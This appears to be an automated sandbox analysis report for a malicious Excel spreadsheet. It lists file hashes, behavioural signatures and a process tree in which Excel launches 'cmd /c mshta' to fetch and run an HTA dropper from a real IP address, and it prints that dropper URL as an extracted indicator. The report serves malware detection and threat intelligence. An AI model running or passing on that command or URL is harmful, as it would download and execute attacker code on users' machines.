Analysis

  • max time kernel
    46s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/08/2024, 21:28

General

  • Target

    4fe8595642d93575581171852e4c7fd1bc120e5e841b7042a5345776f715a6b0.xls

  • Size

    75KB

  • MD5

    f771b3259ad21283830c709b354a86e6

  • SHA1

    5e2c297f6453fefabd7dfb0ed8bee452a0518f1d

  • SHA256

    4fe8595642d93575581171852e4c7fd1bc120e5e841b7042a5345776f715a6b0

  • SHA512

    4dc640c1afcd90efe11d69e7f48875408b5ebd31be896929fa8af116fe331aa79d8175891e24336222ed9616775f433390ca6c3c8fa8ee79b56966322f19c966

  • SSDEEP

    1536:nI+Hymsbck3hbdlylKsgqopeJBWhZFGkE+cMLxAAISQ5gQ72IotO6nitSU6U+x2:nI+HymsYk3hbdlylKsgqopeJBWhZFGkE

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/zzx/ccv/fe.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4fe8595642d93575581171852e4c7fd1bc120e5e841b7042a5345776f715a6b0.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3304
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/zzx/ccv/fe.html
        3⤵
        • Blocklisted process makes network request
        PID:436

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

          Filesize

          2KB

          MD5

          008501ed0b4742cf651e8e539f23374c

          SHA1

          8c06007376095ad6d5745b2cce88e569b0a1e7a4

          SHA256

          4d0af0ac331ec0b763cc0c7fb540935e48d076fb218ccacf0b09b84ffef87f65

          SHA512

          9bf56d11a47bad6b23aaed15b075a5e0842dda2693c733754004c171f96ca794236d41abf278175a5173e64919c6fcc1d2ce6fc2d82cdfb02099da8677eb8ef6

        • memory/2968-12-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-9-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-0-0x00007FFDEA510000-0x00007FFDEA520000-memory.dmp

          Filesize

          64KB

        • memory/2968-5-0x00007FFDEA510000-0x00007FFDEA520000-memory.dmp

          Filesize

          64KB

        • memory/2968-4-0x00007FFDEA510000-0x00007FFDEA520000-memory.dmp

          Filesize

          64KB

        • memory/2968-8-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-1-0x00007FFE2A52D000-0x00007FFE2A52E000-memory.dmp

          Filesize

          4KB

        • memory/2968-10-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-7-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-11-0x00007FFDE84B0000-0x00007FFDE84C0000-memory.dmp

          Filesize

          64KB

        • memory/2968-2-0x00007FFDEA510000-0x00007FFDEA520000-memory.dmp

          Filesize

          64KB

        • memory/2968-13-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-15-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-17-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-19-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-16-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-18-0x00007FFDE84B0000-0x00007FFDE84C0000-memory.dmp

          Filesize

          64KB

        • memory/2968-14-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-6-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-30-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-31-0x00007FFE2A52D000-0x00007FFE2A52E000-memory.dmp

          Filesize

          4KB

        • memory/2968-32-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-33-0x00007FFE2A490000-0x00007FFE2A685000-memory.dmp

          Filesize

          2.0MB

        • memory/2968-3-0x00007FFDEA510000-0x00007FFDEA520000-memory.dmp

          Filesize

          64KB